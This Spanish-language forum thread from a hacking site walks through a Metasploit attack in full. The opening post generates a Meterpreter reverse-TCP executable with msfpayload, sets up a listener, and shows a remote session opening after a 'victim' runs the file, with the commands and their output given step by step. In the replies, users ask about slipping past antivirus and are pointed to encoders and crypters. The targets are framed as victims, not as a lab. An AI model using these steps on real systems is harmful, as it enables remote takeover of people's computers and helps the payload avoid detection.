elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  [Metasploit] Generando Ejecutable con PAYLOAD
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Metasploit] Generando Ejecutable con PAYLOAD  (Leído 15,626 veces)
Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
[Metasploit] Generando Ejecutable con PAYLOAD
« en: 30 Diciembre 2009, 02:32 am »

Generando Ejecutable con PAYLOAD
[Metasploit By: Shell Root]



Despues de explotar la vulnerabilidad en sistemas Windows XP SP 2 [445/tcp "Microsoft Windows XP microsoft-ds"] con el exploit exploit/windows/smb/ms08_067_netapi. Ahora veremos como obtener una session del Meterpreter cuando la victima ejecute un archivo Ejecutable.

Primero generamos el ejecutable con el PAYLOAD windows/meterpreter/reverse_tcp. Así, desde la Shell de Linux:
Código:
shell@ShellRoot:~/msf3$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.5 LPORT=5555 X > /home/shell/hola.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=192.168.0.5,LPORT=5555
shell@ShellRoot:~/msf3$

Nota: Me toco hacerlo desde Linux porque en W1nd0w$, no me funco el parametro X >.

Ahora revizamos la ruta /home/shell/hola.exe y miramos que existe el archivo.



Mandamos el archivo a la Victima, pero antes de ello, debemos configurar el Auxiliary multi/handler, de esta forma:

Código:
shell@ShellRoot:~/msf3$ ./msfconsole

                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888


       =[ metasploit v3.3.3-release [core:3.3 api:1.0]
+ -- --=[ 481 exploits - 220 auxiliary
+ -- --=[ 192 payloads - 22 encoders - 8 nops

msf > use multi/handler

Cabe decir de que debemos de configurar de nuevo el PAYLOAD puesto dentro de archivo ejecutable que creamos al inicio (hola.exe), ponemos los mismos datos. Así:
Código:
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555

Ahora es tiempo de ejecutar nuestro Auxiliary. Pero ejecutarémos digamos que en un "segundo plano", a la espera de que la victima abra el ejecutable que le mandamos. Así:

Código:
msf exploit(handler) > exploit -j
[*] exploit Running as background job.

[*] Starting the payload handler...
[*] Started reverse handler on port 5555
msf exploit(handler) >

Ahora es cuestion de esperar a que la victima abra el archivo y obtendrémos la session del Meterpreter. Supongamos que pasaron varios minutos y que la victima abrio el archivo, nos debe de aparecer esto:

Código:
msf exploit(handler) > [*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.5:5555 -> 192.168.0.2:11735)

By: Shell Root
Fuente: http://shellrootsecurity.blogspot.com/2009/12/generando-ejecutable-con-payload.html
Video: Nothing...

Saludos!
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
xopito

Desconectado Desconectado

Mensajes: 36


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #1 en: 17 Abril 2010, 03:31 am »

que buena pinta tiene, le echaré un vistazo
En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #2 en: 17 Abril 2010, 14:44 pm »

jajaja apliquese el "más vale tarde que nunca"
En línea

Colaboraciones:
1 2
l1vv3r

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #3 en: 18 Abril 2010, 22:14 pm »

Detectan los antivirus de windows el payload del ejecutable?
En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.723


<3


Ver Perfil WWW
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #4 en: 18 Abril 2010, 22:25 pm »

Supongo que algunos lo detectarán, pero para eso estan los encoders!
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
l1vv3r

Desconectado Desconectado

Mensajes: 27


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #5 en: 18 Abril 2010, 22:28 pm »

Gracias por la rápida respuesta.

Me pongo a mirar lo de los encoders!!! Recomiendas alguno??
En línea

manel92

Desconectado Desconectado

Mensajes: 78


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #6 en: 27 Abril 2010, 14:20 pm »

el exploit ms08_067_netapi que yo sepa da reverse shell

para que esperar a que ejecute el archivo si lo podemos hacer nosotros?
En línea

alexkof158


Desconectado Desconectado

Mensajes: 415


LOL


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #7 en: 27 Abril 2010, 18:41 pm »

el exploit ms08_067_netapi que yo sepa da reverse shell

para que esperar a que ejecute el archivo si lo podemos hacer nosotros?
pues por si la victima tiene ya corregido este error se le manda un ejectuble, apenas lo abra bummmmmmmmmmm


PD: Si el av lo detecta usa cripters o los encoders del MSF,,,,,

Saludos  :D
En línea

"noproxy"
b10s_0v3rr1d3

Desconectado Desconectado

Mensajes: 185

si puede hacerse debe hacerse


Ver Perfil WWW
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #8 en: 28 Abril 2010, 00:12 am »

el exploit ms08_067_netapi que yo sepa da reverse shell

para que esperar a que ejecute el archivo si lo podemos hacer nosotros?

dicho fallo tiene ya time, si que aun se pueden ver sistemas con ese fallo pero no tendria que ser normal verlos con tanta facilidad a estas alturas..
En línea

piper_maru

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: [Metasploit] Generando Ejecutable con PAYLOAD
« Respuesta #9 en: 2 Mayo 2010, 13:01 pm »

Buenas, lo he hecho tal y como se explica, pero al ejecutar el .exe no se me abre la shell en el pc atacante, puede ser por el AV o firewall, auunq los he desactivado y sigue sin recibir el reverse.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Duda con Metasploit y Payload vncinject. « 1 2 »
Hacking
oliver91 10 11,559 Último mensaje 4 Junio 2011, 02:01 am
por oliver91
Error al ejecutar payload en formato vbs de metasploit que linea debo modificar
Análisis y Diseño de Malware
Mister12 1 2,670 Último mensaje 2 Julio 2014, 22:00 pm
por MeCraniDOS
windows-metasploit-payload
Windows
elputaso123 8 4,292 Último mensaje 21 Julio 2014, 01:22 am
por elputaso123
metasploit que le pasa con mi payload?
Hacking
nilsonoff 1 2,436 Último mensaje 11 Febrero 2015, 15:24 pm
por exploiterstack
Ayuda con Payload-Metasploit
Hacking
8306Colossus 1 1,818 Último mensaje 29 Diciembre 2018, 01:38 am
por Mogolla
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines